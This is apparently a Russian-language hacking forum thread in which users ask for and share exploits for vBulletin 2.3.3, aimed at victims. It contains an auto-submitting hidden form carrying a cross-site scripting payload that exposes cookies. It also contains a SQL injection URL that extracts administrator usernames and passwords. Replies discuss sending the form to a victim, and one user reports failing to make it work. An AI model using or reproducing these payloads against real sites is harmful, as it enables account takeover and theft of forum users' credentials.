Уязвимости в vBulletin v2.3.3
 

Народ у ко нить есть реальный экплойт для vBulletin V2.3.3?!!!! Если есть по делитесь.. Плиз..

примеры сплойтов:

-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)">"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>

----------------------------------------------------

last.php?fsel=,user.password%20as%20title,user.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

----------------------------------------------------

2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!

это не мой сплойт...но, как я понимаю, это форма для отправки мессаги, код которой будет исполняться в браузере жертвы

+ ты еще не заметил второй сплойт ниже, в старых версиях он может работать...

2 ProTeuS сделал... че-то не получается !!!

прикинь пробовал не получается....